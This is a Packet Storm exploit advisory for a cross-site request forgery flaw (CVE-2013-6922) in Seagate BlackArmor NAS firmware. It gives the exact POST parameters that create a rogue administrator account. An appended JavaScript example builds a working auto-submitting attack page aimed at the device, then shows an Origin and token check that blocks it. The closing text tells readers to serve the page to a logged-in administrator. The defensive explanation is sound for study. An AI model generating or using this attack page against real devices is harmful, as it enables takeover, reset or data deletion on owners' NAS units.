Seagate BlackArmor NAS sg2000-2000.1331 Cross Site Request Forgery

Packet Storm: PACKETSTORM:124686
Published: Jan 06, 2014
Author: Jeroen
Source: packetstormsecurity.com
EPSS: 0.002 (Low), percentile 62.2%

```
# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE: CVE-2013-6922
#
## Description:
#
# Multiple CSRF attacks are possible. The proof of concept shows how an
# attacker can add a user with administrative privileges to the system.
#
# It is also possible to:
#
# 1. Factory reset the device
# 2. Reboot the device
# 3. Add/Edit/Remove users
# 4. Add/Edit/Remove shares and volumes
#
# This vulnerability was reported to Seagate in September 2013; they stated
# that it will not be fixed.
#
## Proof of Concept:
#
# POST: http(s)://<url | ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
# Parameters:
#
# username         attacker
# adminright       yes
# fullname         hacker
# userpasswd       attackers_password
# userpasswdcheck  attackers_password
```
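The request above succeeds because the admin interface authorises it on the session cookie alone: when an administrator who is logged in to the NAS loads an attacker-controlled page, the browser submits the form to the NAS and attaches the cookie, and nothing in the request proves it came from the NAS's own UI. The following is an added example, not code from the advisory or from Seagate: it builds the auto-submitting page for exactly the parameters listed in the proof of concept, models the forged request as the NAS would receive it, and shows the Origin/Referer plus per-session token check that would have rejected it. The NAS address (192.168.1.50), the attacker origin (evil.example), the cookie name, the token field name `csrf_token` and the token value are all assumptions for illustration.

```javascript
// Added example, not part of the original advisory. Builds the attacker-hosted
// page for the request the advisory describes, models the request as the NAS
// would receive it from the victim's browser, and shows the server-side check
// that would have rejected it. The NAS address, the cookie name, the attacker
// origin, the token field name and the token value are all assumptions.

const TARGET_HOST = "http://192.168.1.50"; // assumed NAS address
const ENDPOINT = "/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23";

// Form fields exactly as listed in the advisory.
const CSRF_PARAMS = {
  username: "attacker",
  adminright: "yes",
  fullname: "hacker",
  userpasswd: "attackers_password",
  userpasswdcheck: "attackers_password",
};

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The attacker's page: a hidden form aimed at the NAS that submits itself on
// load. The victim's browser attaches the NAS session cookie automatically, so
// if an administrator is logged in the user is created with admin rights.
function buildCsrfPage(host, endpoint, params) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `<input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join("\n    ");
  return `<!DOCTYPE html>
<html><body onload="document.forms[0].submit()">
  <form method="POST" action="${escapeHtml(host + endpoint)}">
    ${inputs}
  </form>
</body></html>`;
}

// Model of the forged request as the NAS sees it: the victim's cookie is
// present, the Origin is the attacker's site, and there is no anti-CSRF token.
function forgedRequest(host, endpoint, params) {
  return {
    method: "POST",
    url: host + endpoint,
    headers: {
      origin: "http://evil.example",            // attacker page (constructed)
      cookie: "PHPSESSID=victim-admin-session", // assumed cookie name and value
    },
    body: { ...params },
  };
}

// Origin of the request: prefer the Origin header, fall back to Referer (older
// browsers did not send Origin on plain form posts), and treat the absence of
// both as untrusted rather than as same-origin.
function requestOrigin(headers) {
  if (headers.origin) return headers.origin;
  if (headers.referer) {
    try { return new URL(headers.referer).origin; } catch (e) { return null; }
  }
  return null;
}

function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// The check the firmware lacks: a state-changing POST is accepted only when it
// comes from the NAS's own origin and carries the token bound to the session.
function isRequestAllowed(req, expectedOrigin, sessionToken) {
  if (req.method !== "POST") return false;
  if (requestOrigin(req.headers) !== expectedOrigin) return false;
  return constantTimeEqual(req.body.csrf_token, sessionToken);
}

const SESSION_TOKEN = "a2f9c1e0b7d84c33"; // assumed per-session token

// Three requests against the check: the forged one, a same-origin request that
// omits the token, and a legitimate submission from the NAS's own form.
function demo() {
  const forged = forgedRequest(TARGET_HOST, ENDPOINT, CSRF_PARAMS);
  const sameOriginNoToken = { ...forged, headers: { ...forged.headers, origin: TARGET_HOST } };
  const legit = { ...sameOriginNoToken, body: { ...CSRF_PARAMS, csrf_token: SESSION_TOKEN } };
  return {
    page: buildCsrfPage(TARGET_HOST, ENDPOINT, CSRF_PARAMS),
    forgedAllowed: isRequestAllowed(forged, TARGET_HOST, SESSION_TOKEN),
    noTokenAllowed: isRequestAllowed(sameOriginNoToken, TARGET_HOST, SESSION_TOKEN),
    legitAllowed: isRequestAllowed(legit, TARGET_HOST, SESSION_TOKEN),
  };
}

const demoResult = demo();
console.log(demoResult.page);
console.log({ forged: demoResult.forgedAllowed, noToken: demoResult.noTokenAllowed, legit: demoResult.legitAllowed });
```

Serve the generated page from any host the administrator will visit while logged in to the NAS; the browser does the rest. On the defensive side the token check is the one that matters, since the origin check only narrows the attack surface: the NAS's own pages must embed `csrf_token` in every state-changing form and compare it in constant time to the value stored with the session, and a request that carries neither Origin nor Referer should be rejected rather than assumed local.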
